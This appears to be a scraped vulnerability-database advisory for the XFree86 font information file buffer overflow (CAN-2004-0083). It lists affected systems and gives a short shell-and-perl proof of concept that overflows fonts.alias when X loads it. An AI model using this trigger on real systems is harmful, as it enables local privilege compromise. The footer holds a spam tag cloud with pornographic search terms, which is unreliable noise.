exploits , vulnerabilities , articles , XFree86 Font Information File Buffer Overflow Vulnerability
| Title |
XFree86 Font Information File Buffer Overflow Vulnerability |
| Published |
2004-02-10-12:00AM |
| Updated |
2005-05-14-07:30PM |
| Class |
Boundary Condition Error |
| CVE |
CAN-2004-0083 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery is credited to Greg MacManus. |
| Vulnerable |
XFree86 X11R6 4.3 .0.1
XFree86 X11R6 4.3 .0
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
MandrakeSoft Linux Mandrake 9.2
MandrakeSoft Linux Mandrake 9.2 amd64
MandrakeSoft Linux Mandrake 10.0
MandrakeSoft Linux Mandrake 10.0 amd64
RedHat Fedora Core1
RedHat Linux 9.0 i386
Slackware Linux current
Slackware Linux 9.0
Slackware Linux 9.1
Turbolinux Turbolinux Desktop 10.0
Ubuntu Ubuntu Linux 4.1 ia32
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ppc
XFree86 X11R6 4.2.1 Errata
XFree86 X11R6 4.2.1
Immunix Immunix OS 7.3
MandrakeSoft Corporate Server 2.1
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Linux Mandrake 9.0
RedHat Linux 7.3
Slackware Linux 8.1
XFree86 X11R6 4.2 .0
Conectiva Linux Enterprise Edition 1.0
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Workstation 8.0
XFree86 X11R6 4.1 .0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
RedHat Advanced Workstation for the Itanium Processor 2.1
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux WS 2.1
RedHat Linux 7.1 i386
RedHat Linux 7.2 i386
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Workstation 7.0
XFree86 X11R6 4.1 12
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1.1
XFree86 X11R6 4.1 11
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1.1
Sun Solaris 9.0 _x86
Sun Solaris 9.0
Sun Solaris 8.0 _x86
Sun Solaris 8.0
Sun Solaris 7.0 _x86
Sun Solaris 7.0
SGI ProPack 2.4
SGI ProPack 2.3
SCO Unixware 7.1.3
SCO Open UNIX 8.0
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
IBM AIX 5.2
IBM AIX 5.1
IBM AIX 4.3.3
HP HPUX 11.23
HP HPUX 11.22
HP HPUX 11.11
HP HPUX 11.0 4
HP HPUX 11.0
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0 |
| Not Vulnerable |
XFree86 X11R6 4.3 .0.2 |
| Code |
Currently we are not aware of any working exploits for this issue. The following proof-of-concept example has been provided:
From the command line:
# cat > fonts.dir <<EOF
1
word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
EOF
# perl -e 'print "0" x 1024 . "A" x 96 . "
"' > fonts.alias
# X :0 -fp $PWD
The Following exploit has also been provided:
/data/vulnerabilities/exploits/xFreeFontBufO.c
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 08:53:14 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
grupsex 200 /compo Crack Data prxp www.slazy vuln/explo actress me Www.dudhwa WwwLiveSex www.oa007. www.amishd free sexy Sania nake IMAP sdzhongdun /search/ex www.indian news for c Opera9_hre actress me hafeida katrina na free vedie www.iranxr porn pics vnc scanne sexy vidi mod_ssl mo foto2 porn Toket gede news for c meena sex trisha *** YUNGER SEX Nude Priti tenage sex Crack Data 1626384815 w.w.w.xxxv www.newspa News Searc www.xxl co Proftpd+1. defendir iGeneric i www.bj9991 9lei.cn my friends /search/ex edonkeyclc
|
